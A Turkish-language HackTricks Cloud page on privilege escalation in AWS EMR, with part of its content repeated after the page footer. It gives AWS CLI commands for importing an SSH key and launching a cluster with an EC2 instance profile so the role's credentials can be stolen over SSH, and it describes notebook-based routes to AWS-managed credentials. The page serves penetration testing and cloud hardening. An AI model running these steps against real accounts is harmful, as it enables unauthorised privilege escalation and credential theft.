AWS - EMR Privesc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

EMR

Daha fazla EMR hakkında bilgi için:

AWS - EMR Enum

`iam:PassRole`, `elasticmapreduce:RunJobFlow`

Bu izinlere sahip bir saldırgan, EC2 rollerini ekleyerek yeni bir EMR kümesi çalıştırabilir ve kimlik bilgilerini çalmaya çalışabilir. Bunu yapmak için, hesaba ithal edilmiş bazı ssh özel anahtarlarını bilmeniz veya bir tane ithal etmeniz ve ana düğümde port 22'yi açabilmeniz gerektiğini unutmayın (bunu --ec2-attributes içindeki EmrManagedMasterSecurityGroup ve/veya ServiceAccessSecurityGroup öznitelikleri ile yapabilirsiniz).

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Not edin ki bir EMR rolü --service-role içinde belirtilirken, bir ec2 rolü --ec2-attributes içinde InstanceProfile olarak belirtilir. Ancak, bu teknik yalnızca EC2 rolü kimlik bilgilerini çalmaya izin verir (çünkü ssh üzerinden bağlanacaksınız) ama EMR IAM Rolü'nü çalamaz.

Olası Etki: Belirtilen EC2 hizmet rolüne privesc.

`elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`

Bu izinlerle bir saldırgan AWS konsoluna gidebilir, bir Notebook oluşturabilir ve IAM Rolünü çalmak için erişebilir.

Notebook örneğine bir IAM rolü eklesem de, testlerimde AWS yönetilen kimlik bilgilerini çalmayı başardığımı fark ettim ve IAM rolü ile ilgili kimlik bilgilerini çalamadım.

Olası Etki: AWS yönetilen rolüne privesc arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

`elasticmapreduce:OpenEditorInConsole`

Bu izinle bir saldırgan Jupyter Notebook'a erişebilir ve ona bağlı IAM rolünü çalabilir. Notebook'un URL'si https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/

Notebook örneğine bir IAM rolü eklesem de, testlerimde AWS yönetilen kimlik bilgilerini çalmayı başardığımı fark ettim ve IAM rolü ile ilgili kimlik bilgilerini çalamadım.

Olası Etki: AWS yönetilen rolüne privesc arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - Elastic Beanstalk Privesc NextAWS - EventBridge Scheduler Privesc

Last updated 3 days ago

EMR

Daha fazla EMR hakkında bilgi için:

AWS - EMR Enum

iam:PassRole, elasticmapreduce:RunJobFlow

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Olası Etki: Belirtilen EC2 hizmet rolüne privesc.

elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole

Bu izinlerle bir saldırgan AWS konsoluna gidebilir, bir Notebook oluşturabilir ve IAM Rolünü çalmak için erişebilir.

Notebook örneğine bir IAM rolü eklesem de, testlerimde AWS yönetilen kimlik bilgilerini çalmayı başardığımı fark ettim ve IAM rolü ile ilgili kimlik bilgilerini çalamadım.

Olası Etki: AWS yönetilen rolüne privesc arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

elasticmapreduce:OpenEditorInConsole

Notebook örneğine bir IAM rolü eklesem de, testlerimde AWS yönetilen kimlik bilgilerini çalmayı başardığımı fark ettim ve IAM rolü ile ilgili kimlik bilgilerini çalamadım.

Olası Etki: AWS yönetilen rolüne privesc arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile